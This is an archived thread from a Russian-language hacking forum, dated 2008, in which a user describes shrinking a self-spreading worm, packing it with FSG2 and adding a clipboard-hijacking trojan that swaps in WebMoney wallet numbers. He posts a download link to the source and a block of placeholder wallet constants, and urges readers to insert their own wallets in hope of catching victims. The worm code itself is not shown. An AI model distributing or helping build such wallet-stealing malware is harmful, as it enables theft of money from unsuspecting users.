ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Программирование > С/С++, C#, Delphi, .NET, Asm
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 10.02.2008, 23:16
execom
Познающий
Регистрация: 05.06.2007
Сообщений: 50
Провел на форуме:
151281

Репутация: 259
Отправить сообщение для execom с помощью ICQ
По умолчанию

Цитата:
Даже размером в полтора килобайта.
Слова человека любящего споры типа - а вот мой дешка - капитан на корабле!!!))) Вообще если сделать не службой, как у меня, и не делать api-шный счётчик, а использовать sleep() то размер составит окло 1200 байт..

Цитата:
Кстати на делфи тоже можно сделать еще меньше если модуль компилить с помощью Delphi3 в OBJ и собирать майкрософтовским линкером.
Извиняюсь за жаргон, без соплей известно, кстати таким методом я многие программы в том числе и представленные на аччате писал, но в этом случае этот вариант оказался меньше размером.. Поясняю. Если писать проги этим методом, то их нельзя упаковывать ибо они после этого отказуются работать, а прога написанная без RTL имеет стандартный формат и поэтому может быть упакованной.. Так вот, прога компилированная тем методом имеет вес 3100 байт...

На счет дополнительных функций я думаю добавить в черв на всякий пожарный WM-троя... Исходник в этом же топике выложу...
 
Ответить с цитированием

  #12  
Старый 11.02.2008, 19:53
Slip
Новичок
Регистрация: 26.06.2007
Сообщений: 16
Провел на форуме:
236658

Репутация: 37
По умолчанию

Ни кого не хотел обидеть.
 
Ответить с цитированием

  #13  
Старый 13.02.2008, 13:44
execom
Познающий
Регистрация: 05.06.2007
Сообщений: 50
Провел на форуме:
151281

Репутация: 259
Отправить сообщение для execom с помощью ICQ
По умолчанию

Как и обещал, добавил в этого червя функцию WM-троя (подменщик буфера обмена с номером кошелька).. Теперь червь после пака FSG2 весит 3029 байт, т.е. почти дотягивает до трёх килобай... Вот исходник: virusoff.pisem.su/WM_WORM.RAR . Компилировать исходник нужно так же как и предыдущий... В случае применения не забудьте в константах вставить свои кошельки, авось кто-то и поймается)))
Код:
U                              = 'U11111111111';
E                              = 'E22222222222';
R                              = 'R33333333333';
Z                              = 'Z44444444444';
 
Ответить с цитированием

  #14  
Старый 21.02.2008, 20:06
Slanter
Участник форума
Регистрация: 09.01.2008
Сообщений: 120
Провел на форуме:
103538

Репутация: 29
Отправить сообщение для Slanter с помощью ICQ
По умолчанию

Цитата:
Кстати на делфи тоже можно сделать еще меньше если модуль компилить с помощью Delphi3 в OBJ и собирать майкрософтовским линкером.
Это точно
 
Ответить с цитированием

  #15  
Старый 22.02.2008, 23:38
execom
Познающий
Регистрация: 05.06.2007
Сообщений: 50
Провел на форуме:
151281

Репутация: 259
Отправить сообщение для execom с помощью ICQ
По умолчанию

Цитата:
Сообщение от Второй поддакнул  
Цитата:
Сообщение от Один ляпнул  
Кстати на делфи тоже можно сделать еще меньше если модуль компилить с помощью Delphi3 в OBJ и собирать майкрософтовским линкером.

Это точно
Я же ответил на вопрос, по поводу целесообразности применения этого метода.. Зачем создавать оффтопно-флудёрские посты??
 
Ответить с цитированием

  #16  
Старый 26.02.2008, 04:18
symbioin
Познающий
Регистрация: 06.08.2007
Сообщений: 84
Провел на форуме:
373338

Репутация: 25
Отправить сообщение для symbioin с помощью ICQ
По умолчанию

да плодится ето наверное цель жызни вируса... до етого как его антивирус встретит
[img=http://img245.imageshack.us/img245/1395/capture2ql4.th.jpg]
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Защищаем Flash-Drive (а так же USB-HDD) от заразы. -=lebed=- Авторские статьи 30 17.06.2009 16:19
Сервис на Delphi Api весом 1849 байт execom С/С++, C#, Delphi, .NET, Asm 6 14.12.2007 12:04



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ